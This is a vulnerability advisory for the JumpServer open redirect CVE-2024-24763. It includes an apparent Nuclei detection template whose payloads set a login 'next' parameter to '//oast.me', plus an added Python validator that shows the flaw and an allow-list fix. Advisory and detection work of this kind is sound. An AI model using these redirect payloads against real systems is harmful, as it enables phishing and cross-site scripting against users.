CVE-2024-24763: JumpServer < 3.10.0 - Open Redirect

Date: 2025-08-01 | Affected software: JumpServer | PoC: public

Vulnerability description

JumpServer is an open source bastion host and an operations and maintenance security audit system. Prior to version 3.10.0, an attacker can craft a malicious link that, once a user is led to click it, redirects them off-site, facilitating phishing or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.

PoC code [public]

id: CVE-2024-24763

info:
  name: JumpServer < 3.10.0 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
  reference:
    - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24763
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
    cvss-score: 4.3
    cve-id: CVE-2024-24763
    cwe-id: CWE-601
    epss-score: 0.26411
    epss-percentile: 0.96144
    cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:*  # must match vendor/product under metadata
  metadata:
    max-request: 1
    vendor: fit2cloud
    product: jumpserver
    fofa-query:
      - title="JumpServer"
      - title="jumpserver"
  tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated

http:
  - raw:
      - |
        POST /{{paths}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    payloads:
      paths:
        - "core/auth/login/?next=//oast.me"
        - "auth/login/?next=//oast.me"
        - "login/?next=//oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4a0a004730450220552346f1456cf110fe87839ef555fdce5780623e291a3988d2a2917e8eaa06f3022100834ef3b56c984db4d2e166f12a62f0c1fb41fe1fb871f2e511ca749ef782c042:922c64590222798bb761d5b6d8e72950
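As an added example (not code from JumpServer or from the template author), the Python validator below shows why the protocol-relative payload used above (`next=//oast.me`) slips past a naive "starts with a slash" check, and how a host allow-list on the `next` parameter rejects it; the allowed host name is a constructed value.

```python
"""Safe handling of a login ``next`` parameter (CWE-601 mitigation).

Added example, not JumpServer's own code. The allowed host is a
constructed value; replace it with the deployment's real host name.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"jumpserver.example.internal"}  # constructed for the example
DEFAULT_NEXT = "/"


def naive_is_local(url):
    """The kind of check an open redirect relies on: '//oast.me' passes it."""
    return url.startswith("/")


def safe_next(url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_NEXT):
    """Return ``url`` only if it stays on an allowed host, else ``default``."""
    if not url:
        return default
    # Browsers treat a backslash like a forward slash in the scheme and
    # authority part, so normalise before inspecting the string.
    url = url.strip().replace("\\", "/")
    if url.startswith("//"):
        # Browsers collapse any run of leading slashes and read the next
        # segment as the host (protocol-relative URL), so do the same and
        # check that host against the allow-list.
        authority = url.lstrip("/").split("/", 1)[0]
        authority = authority.split("?", 1)[0].split("#", 1)[0]
        host = authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()
        return url if host in allowed_hosts else default
    parts = urlsplit(url)
    if parts.scheme:
        # Absolute URL: only http(s) to an allowed host may pass; this also
        # rejects javascript: and data: schemes.
        if parts.scheme.lower() not in ("http", "https"):
            return default
        host = (parts.hostname or "").lower()
        return url if host in allowed_hosts else default
    # No scheme and no authority: accept only a root-relative path.
    return url if url.startswith("/") else default
```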
